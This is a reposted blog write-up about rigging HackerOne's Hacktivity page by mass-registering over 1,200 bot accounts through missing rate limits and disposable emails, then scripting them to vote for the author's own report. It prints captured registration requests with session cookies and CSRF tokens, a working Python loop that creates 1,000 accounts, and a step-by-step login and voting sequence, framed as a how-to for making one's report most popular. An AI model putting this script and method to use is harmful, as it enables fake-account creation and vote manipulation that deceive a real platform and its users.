Security and Technology

How i owned Hackerone Hacktivity page – Learn Penetration Testing & Ethical Hacking

Automation is one of the amazing methods to do some undesired actions or penetest a web application, it is so good to relax and watching a bot make actions in your behave this article will show you how to perform automation by explaining the one performed on hackerone at the begging of September .

##Using this will allows you to :
– make your own report the most public one.
– Get the badge of most popular report on feeds.

Hi ,
To those who know or do not , i think no one does not love automation , i will talk about it and explain in details how i controlled hacktivity page on hackerone and set olx reports to be the most popular with higher number of votes using 1k of bots.

What is automation ?
First what goes in your mind when you hear ‘manually’ , it is mean done by human hands, right!.
So automation is these actions made by other things but not humans , it is done by bots , robots , computers or zombies .
According to wikipedia : is the use of various control systems for operating equipment such as machinery, processes in factories, boilers and heat treating ovens, switching on telephone networks, steering and stabilization of ships, aircraft and other applications with minimal or reduced human intervention. Some processes have been completely automated.

We will focus in our main point , Automation on web services .

Dependencies
So if you want to automate a web application , on what does that depend ?
the main factor on automation on wep application is rate limit , if a website does not implement a rate limit , you can automate it easily , there are other factors , but you can bypass it .

Requirements

– Understand of how the target works .
– Specify the action you want to make.
– Technique to use to make some undesired actions .
– Bypass baffles like csrf session and rate limit if exists .
– Some bots ‘Optional depends on the target and action required’
– An automation tool , or programming knowledge

Hackerone

Let’s get in to our example , Hackerone is the most popular bug bounty platform , i scanned their website , and i admit i could not find anything interesting so i decided to play with their system and i found many weakness by chance.

Earlier before i requested to disclose a bug that resolved by olx , they accepted to publicly disclose it , and i decided to make it the most popular , i began investigating what i need to do that .
Understanding How hackerone works
1- i scanned hackerone many times , found nothing they protected against common issues like XS, sqli and RCE ,on 25 August i discovered hackerone already protected against CSRF , but fortunately their tokens is not secured 100 % , they considered their users , but did not conisder their system .

What i need and what i should do ?
My main goal is to increase the votes on certain report , their hacktivity page has two tabs the main is popular reports and the second for the newest reports .
i need more accounts to vote , it is hard if not impossible to do it manually , i started to create a new account and intercepted the request and found that it could be used to create unlimited number of accounts .

Technique
We need about 500 ids because the most popular report on hackerone is RCE found on pornhub with 280 votes so we just need 282 but hackerone consider other factors like date of disclosure and bounty so i decided that 1K is good enough ,Then we need to make these bots vote on the required report .so i need to understand the process of login and post requests submissions for making real action to program my bots to make same processes .

Bypassing baffles
Hackerone does not prevent users from multi registration , any one can own a huge number of registered accounts.
no rate limit was performed by Hackerone , this will not stop us.

Creating bots
Hackerone allows any email address on registeration process , this can help me using disposable mails like YOPMAIL , my friend Saed hashem suggested to use aliases of email ,that mean you can use xy@gmail.com to register first account and then adding a single dot or plus in the email , and hackeone will consider it another different email and you can register new account with the same email by using an alias of dot or plus anyway i used yopmail and i have my reasons.

Start attack
Once you understood the target and how it works , specified an action , created some bots , prepared your tool , you can start the attack .

Let’s Begin

The first step i made was to first create the bots , i must tell you this was a mistake , because you might spend hours and weak your connection on creating bots manually or automated , you then find that real actions may be limited and you can not automate it , but fortunately i was lucky that were no limits and my attack is possible .

I navigated to registration page on hackerone and filled my details , submitted the form and intercepted the request..

____________________________________________________________________

POST /users HTTP/1.1
Host: hackerone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: oueE yECJPxFdAPJA8d70WvAfz0NoITWJ/RlQN Sg2sZBkKpnvDLtf8rIaTq09DTAOBHNxB61sHFWnVQ/ruenQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ift.tt/17NzeQt
Content-Length: 189
Cookie: __cfduid=d7742669d928f93669b15d43eac71c1f71473642918; __Host-session=NDlwM2FPZmp3aCtJbVJ3Vy9zK3VmQUVodGt6VStuTXVodk80WjVmMFlPV2FUS3RpL3cxRVFTT0VlVzdYMERWaVE2MENwdHkvbW8vT0JwNjZoeUYzYkEyUHFPU0g4ZDdINjBWdU9RQ1pYY1V4RlB2MzVjVWRsWVRYSXloSXFmdHhQVUtYeU9od0hhTFF6NGMvek5UR3p2aFZqVldEZ0dDRkFqMzRkeWxpT0lkODYyS0Y0Rk5RbkpsNVExcXhyVEFzLS1WWWZhenJKbldVNjh3RmpkMjdHenVBPT0=–ebbc2bea1b093f0d24bff6f257b7ce5a38460f44; _ga=GA1.2.1002285040.1473642950; _gat=1
Connection: close

user[name]=thisismyname&user[username]=thisisusernamex&user[email]=thisisemail@yopmail.com&user[password]=123qwe!@#QWE&user[password_confirmation]=123qwe!@#QWE

_________________________________________________________

And the response was

____________________________________________________________________

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2016 01:22:01 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 46
Set-Cookie: __Host-session=blah
Connection: close

{“redirect_path”:”/users/sign_in”,”errors”:{}}

____________________________________________________________________

Now we have created an account with a username=thisismynamexx and email=thisisemailx@yopmail.com.
So to create a new account , you have to change the username and email , regardless to other parameters , I did it immediately and it was accepted.
It is very cool, you can set burp intruder and tell it to change the username and email and you can make more than 5 Ids/sec , let’s make it :

We got a problem , internal server error occurred , this is not a rate limit , but this due to more requests at the same time like race condition ,We should sleep some after each request , it is not a big problem , but we can not handle it using burp so , let’s make it using Python

____________________________________________________________________

import requests,time
requests.packages.urllib3.disable_warnings()

_headers_ = {
“User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:47.0) Gecko/20100101 Firefox/47.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01″
,”Accept-Language”: “en-US,en;q=0.5″
,”X-CSRF-Token”:”JSFMAnHPA7fm7d3cQWtmU220kwibz1Ojc/74HYpYx8WJDa/tabBr9JpaeJQJtrc/z3UmTEBO354TZWvyhDuCVA==”
,”Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8″
,”X-Requested-With”: “XMLHttpRequest”
,”Referer”: “http://ift.tt/17NzeQt”
,”Cookie”:”__cfduid=d1cdfc0b504bd870dc94c5509a2f41bd71472917466; _ga=GA1.2.1635264352.1472917475; __Host-session=anhEcDkzOVVwYWxDL2pVSTJ3NTZWeHFVUzhTTzVHbDNzK1lQUWl3eG53Q0xyNHdLY3Y5aHJsQnl4VUNtSjI4OWx6bFozRDZDcFBRQVlXdjBsMXpaUEFNR3ZpTFV6c1NVU2s0TnBvMFhVZTAxWEVyUXVQT2FDSExUNjFZQW16UG1IWWlxaE9Zd0h1SFNmKytFWW52eG81N0xqWTh1QW16bS9leThwME1sQXllWE00bHJCN2NqNTlMN3pWckN2eXFULS1qcFJoTW1SSVF6VkVVQXllT1QwUy93PT0%3D–94bd223fffd82f1c61b2d03cc2f0be5ac1f3b93a; _gat=1″}

_url_ = ‘http://ift.tt/2f8b9zx’
okbody='{“redirect_path”:”/users/sign_in”,”errors”:{}}’
#now we have the headers

for i in range(0,1000):
username=’mrexceptionxbot’+str(i)
pas=’123qwe!@#QWE’
_data_=”user[name]=Egy+Bots&user[username]=”+username+”&user[email]=”+username+”%40yopmail.com&user[password]=”+pas+”&user[password_confirmation]=”+pas
isregistered=False
while isregistered == False:
r =requests.post(url=_url_,data=_data_,headers=_headers_)
if okbody in r.text:
isregistered=True
print ‘success ‘+username
else:
time.sleep(5)
time.sleep(2)

____________________________________________________________________
Let’s explain the code :
1- We import the requests module , Amazing module for HTTP
2- Disabling warnings
3- We collected all headers in a dictionary
4- the url we used in registering
5- if registration succeeded , the response body will contains this value
6- Begin the loop to create 1000 accounts
7- building the username we will use , every loop the i increase and changes the username , pas is the password .
8- Data is equal to the request body we will send in the request , email is built using username@yopmail.com
9- This variable will help to retry if a registration failed once , and to make sure all i values used and all ids are registered successfully.
10- Starting the condition to make sure the registration succeeded .
11- Sending the request
12- Check if the response body contains the ‘successful registration message’
13- Checking if registration succeeded it will continue registration , if it failed it will wait 5 seconds and retry again with the same username .
14- When registration succeeded it will wait 2 seconds to prevent internal server errors occurrence.

It is ok , Now we registered the bots , but Hackerone asks for activation so we need to g to yopmail and start clicking all links associated with each account we registered .

I already created more than 1200 Ids and activated all of them , i did not try to automate this process , because Yopmail implement a security captcha , even i used it manually i was being blocked for sometimes , but with a few research i found it could be automated .

You have your army now , created your bots , activated them , let’s kill some .

Before launching bots , we need to program them to do some undesired actions , so you need to understand how Hackerone works , we need to simulate the login process first , discover how a real action is made .

The first thing is to clear all your cookies , start login , do some actions and watch what is happening and how it done .

First i requested the login page , then filled my credits and submitted the request , Hackerone logged me in and redirected me to the hacktivity page and i finally voted for a random report .
You see many requests , we just care only about login requests and voting request .

Most of these requests is not valuable , we need the most interesting requests to ask the bots to do the same , after reviewing the request , i kept these

I cleared my cookies many times and retry to make the same process , every time i fail by deleting one of these 6 requests , so all of them are required except the last one it is a real action you can replace it with any other action since it use the CSRF token .

By analyzing these requests from the last to the first i discovered the following :

1- Last action ‘Voting’ is made using the csrf token sent in response of request 4 and the session cookie value sent to request 5
2- Request 5 is made to ask hackerone to send a valid CSRF token for real action , using session cookie value sent to request 4
3- Request 4 is made to init session , using cookie sent to request 3
4- Request 3 is made to check if user credits are valid or not , using cookies sent to request 2.
5- Request 2 is made to ask hackerone for starting login process , using first cookies
6- Request 1 is made with no cookies , mad speciffically to get first cookies from Hackerone

So our scenario for bots
1- We send an empty request to ask hackerone for some cookies [GET].
2- Using these cookies , and requesting login process [GET]
3- Sending bot username and passsword with cookie sent in stage 2 [POST]
4- Resending the username andd password with cookie sent in stage 3 [POST]
5- Asking hackerone for real action CSRF Token [GET] with cookie sent in stage 4
6- Using CSRF token and last cookies sent , and perform any real action , like voting or submitting random reports

We have the bots now , and we have the scenario :

The post How To owne Hackerone Hacktivity page and earn new badge [NotFixed] appeared first on Learn Penetration Testing & Ethical Hacking. http://ift.tt/2dLdWZI http://ift.tt/2aM8QhC

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s